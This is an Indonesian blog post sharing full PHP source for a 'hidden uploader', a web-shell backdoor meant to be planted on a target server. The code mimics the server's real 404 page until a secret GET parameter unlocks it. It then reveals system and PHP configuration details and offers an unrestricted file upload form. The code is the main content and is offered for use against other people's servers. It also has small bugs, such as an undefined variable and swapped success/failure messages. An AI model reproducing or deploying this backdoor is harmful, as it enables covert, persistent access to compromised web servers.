Ad Unit (Iklan) BIG

Santuy People - Super Hidd3n Uploader

1 comment


-

Hai sobat

Saya ikal,

Disini saya akan share sesuatu nih.

-


Sudah lumayan lama saya tidak membuat artikel lagi, Ya gitu lah.


Okeh kita langsung saja masuk kepembahasan.


Untuk tampilannya kira - kira seperti gambar dibawah ini : 



Nah untuk tampilannya sangat sederhana yah. Namun yang membuatnya menarik bukan itu :D. Oke kita ke fiturenya.


Fiture :

  1. Hidden.
    •  Use get method.
    •  Use Session (Cookies).
    •  Tampilan 404 sebelum memanggil request GET.
  2. Get System.
  3. Get PHP Version.
  4. Get Server name.
  5. dll

 

Sedikit detail lagi nih, 

- Jadi saat kalian belum memanggil requestan getnya, uploader akan berpenampilan 404, Tampilan 404 nya beragam, atau bisa dibilang (Menyesuaikan dengan tampilan 404 server target kalian).

- Dan cara memanggil uploadernya cukup mudah, 

Example : https://localhost/uploader.php?1337=1337

- Karena ini menggunakan session, jadi jika kalian sudah pernah memanggil uploadernya sekali, kalian tidak perlu mengaksesnya lagi menggunakan get methode. Kecuali jika kalian membersihkan cache browser :D.


Source Code : 


<?php
  error_reporting(0);
  ini_set('max_execution_time',0);
  session_start();
  $name="1337";
  function login() { 
    $random_url = mt_rand(1000000, 247345736453);
    $curl = curl_init();
    $protocol = 'http://';
    if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') { $protocol = 'https://'; }
    curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $server_404 = curl_exec($curl);
    $server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
    $server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
    echo $server_404;
    exit;
  }
  if (!isset($_SESSION[md5($sexy)]))
    if (isset($_GET[$name]) && ($_GET[$name] == $name))
      $_SESSION[md5($sexy)] = true;
  else login();
?>
<?php
echo"
<meta name='theme-color'content='#000000'>
<style>
body{
	background:#202020;
	color:#00D5C6;
	text-align:center;
	font-family:Arial;
}
</style>";
$uname = php_uname();
$serversoftware = $_SERVER['SERVER_SOFTWARE'];
$servername = $_SERVER['SERVER_NAME'];
$serverip = $_SERVER['SERVER_ADDR'];
$safemode = ini_get('safe_mode') ? "Enabled" : "Off";
$openbasedir = ini_get('open_basedir') ? "Enabled" : "Off";
$disabledfunc = ini_get('disable_functions');
$phpversion = phpversion();
$domain = $_SERVER['HTTP_HOST'];
echo "<br><br><center>";
echo"
<font color='white'><h1>SANTUY PEOPLE </h1>
<img src='https://img.shields.io/badge/Version-1.1.1-brightgreen.svg?style=style=flat-square' alt='version'>
<br><p align='left'>
		System:<font color='lime'>	$uname </br></font>
		PHP Version:<font color='lime'>$phpversion<br></font>
		Server Name:<font color='lime'>$servername </font><br>
		Server IP:<font color='lime'>$serverip<br></font>
		safe_mode:<font color='lime'>$safemode<br></font>
		open_basedir:<font color='lime'>$openbasedir<br></font>
		Disabled Functions:<font color='lime'>$disabledfun<br></font>
";    
echo "<center><form method='post' enctype='multipart/form-data'>
<input type='file' name='x'><input type='submit' name='upload' value='upload'>
</form>";
if($_POST['upload']) {
	if(@copy($_FILES['x']['tmp_name'], $_FILES['x']['name'])) {
	echo "Failed";
	} else {
	echo "Success";
	}
	}
?>


Nah segini saja tutorial kali ini, kurang lebihnya biarkan saja :D. 


Thanks

See U

Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

1 comment

Post a Comment

Dapatkan Notifikasi Dengan Email